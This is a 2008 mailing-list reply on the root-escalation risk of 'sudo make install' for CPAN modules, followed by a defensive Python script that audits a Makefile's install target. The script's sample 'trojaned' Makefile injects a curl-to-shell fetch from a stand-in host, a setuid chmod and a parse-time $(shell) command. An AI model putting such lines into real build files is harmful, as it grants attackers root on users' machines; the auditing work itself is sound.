# from Michael Peters
# on Monday 22 September 2008 09:24:

>> Correct me if I've misunderstood something, but if you have a
>> malicious user on your box, I would assume that them trying to
>> attack a CPAN install process is the least of your worries.
>
>You're right. If they are a malicious user then they will find a way
> to screw you. I'm just saying that since we know about this path,
> let's eliminate it, or at least make it public and known.

Injecting something into the 'make install' target could be a known and 
predictable way to acquire root privileges.  So, it is a way for a 
small leak from e.g. a www-user hole to get much bigger.

And that's why you shouldn't run 'sudo make install' -- it is still 
arbitrary code.

If anyone has some tuits, this would really like to have an installer 
(needs to either run visudo or tell you what to put in it) and some way 
to test it (like a chroot).

  http://scratchcomputing.com/svn/stowpan/trunk

>>  This is a CPANTS issue.
>
>I agree.

Yes.  There is already an 'unpacks nicely' metric, right?

--Eric
-- 
"It works better if you plug it in!"
--Sattinger's Law
---------------------------------------------------
    http://scratchcomputing.com
---------------------------------------------------

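The point above, that a 'make install' recipe is arbitrary code and that sudo runs it as root, can at least be checked mechanically before the fact. The following is an added example for this thread, not code from the original message or from stowpan: it parses a plain Makefile, collects the recipe lines `make install` would run (prerequisites included), and flags commands that are not simple file placement, `$(shell ...)` expansions that run when the Makefile is parsed (for any target), and chmod calls that set a setuid/setgid bit. The two Makefiles, the `example.invalid` URL and the command allowlist are constructed for the example.

```python
"""Audit the `install` target of a Makefile before handing it to sudo.

Added example for this thread; not code from the original message or from
stowpan. Handles plain explicit rules only (no `include`, pattern rules or
line continuations); the command allowlist is this example's own assumption.
"""
import re

# Commands one expects in an install recipe: file placement only (assumption).
ALLOWED = {"install", "cp", "mkdir", "chmod", "chown", "ln", "rm", "rmdir",
           "mv", "test", "echo", "true"}

RULE_RE = re.compile(r"^([^\s:=#]+)\s*:(?!=)\s*(.*)$")   # "target: prereqs", not "VAR := x"
SHELL_SEP_RE = re.compile(r"\|\||&&|[|;]")               # splits a recipe line into commands
PARSE_SHELL_RE = re.compile(r"\$\(\s*shell\b")           # $(shell ...) outside a recipe
EXPANSION_RE = re.compile(r"\$\(\s*shell\b|`")           # $(shell ...) or backticks in a recipe
SETUID_RE = re.compile(r"\b[2467][0-7]{3}\b|[+=]\w*s")   # chmod modes that set an s-bit


def parse_rules(text):
    """Map each target to (prerequisites, recipe lines)."""
    rules, current = {}, None
    for line in text.splitlines():
        if line.startswith("\t"):               # recipe line of the current rule
            if current is not None:
                rules[current][1].append(line[1:].strip())
            continue
        if not line.strip() or line.lstrip().startswith("#"):
            continue
        current = None
        m = RULE_RE.match(line)
        if m:
            current = m.group(1)
            rules.setdefault(current, ([], []))[0].extend(m.group(2).split())
    return rules


def recipe_for(rules, target, seen=None):
    """(target, recipe line) pairs that `make target` would run, prerequisites first."""
    seen = set() if seen is None else seen
    if target in seen or target not in rules:
        return []
    seen.add(target)
    prereqs, recipe = rules[target]
    lines = []
    for p in prereqs:
        lines.extend(recipe_for(rules, p, seen))
    lines.extend((target, r) for r in recipe)
    return lines


def commands(recipe_line):
    """(command word, shell segment) for each command in a recipe line."""
    out = []
    for segment in SHELL_SEP_RE.split(recipe_line.lstrip("@-+ ")):
        tokens = segment.split()
        while tokens and re.match(r"^[A-Za-z_]\w*=", tokens[0]):   # skip VAR=value prefixes
            tokens.pop(0)
        if tokens:
            out.append((tokens[0], segment.strip()))
    return out


def audit_install(text, target="install"):
    """Return (where, line, reason) findings; an empty list means nothing was flagged."""
    findings = []
    # Parse-time expansions run for *any* target, as whoever invoked make.
    for line in text.splitlines():
        if not line.startswith("\t") and not line.lstrip().startswith("#") \
                and PARSE_SHELL_RE.search(line):
            findings.append(("(parse time)", line.strip(), "shell runs when the Makefile is parsed"))
    for tgt, line in recipe_for(parse_rules(text), target):
        if EXPANSION_RE.search(line):
            findings.append((tgt, line, "shell runs when the recipe is expanded"))
            continue
        for word, segment in commands(line):
            if word.startswith("$"):
                findings.append((tgt, line, f"command comes from variable {word}"))
            elif word not in ALLOWED:
                findings.append((tgt, line, f"'{word}' is not a file-placement command"))
            elif word == "chmod" and SETUID_RE.search(segment):
                findings.append((tgt, line, "chmod sets a setuid/setgid bit"))
    return findings


# Constructed sample Makefiles for the demonstration.
CLEAN_MAKEFILE = """\
PREFIX = /usr/local
bindir = $(PREFIX)/bin

all: build

build:
\tperl Makefile.PL

install:
\tmkdir -p $(DESTDIR)$(bindir)
\tinstall -m 0755 bin/mytool $(DESTDIR)$(bindir)/mytool
"""

# Same file with two lines injected into the install recipe plus a parse-time expansion.
TROJANED_MAKEFILE = CLEAN_MAKEFILE + """\
\t@curl -s http://example.invalid/payload | sh
\t@chmod 4755 $(DESTDIR)$(bindir)/mytool

BANNER := $(shell id >> /tmp/owned)
"""

if __name__ == "__main__":
    for name, text in (("clean", CLEAN_MAKEFILE), ("trojaned", TROJANED_MAKEFILE)):
        print(f"== {name}")
        for where, line, reason in audit_install(text) or [("-", "-", "nothing flagged")]:
            print(f"  [{where}] {line}\n      {reason}")
```

Run as a script to see the two reports. Note what this does and does not catch: an allowlisted `cp` to an absolute path outside `$(DESTDIR)`, or an `echo ... >> /etc/sudoers`, passes it, and `include`d fragments and recursive `$(MAKE)` are only flagged, not followed, so treat it as triage before granting root, not as a guarantee. It also makes the thread's point concrete in two ways: `$(shell ...)` in a variable assignment runs as root for any target once the Makefile is parsed under sudo, and an `install` target that depends on `build` runs the whole build as root too. The structural fix the message points at is to build and stage everything as an unprivileged user and give root only to a narrow, reviewed installer with its own sudoers entry.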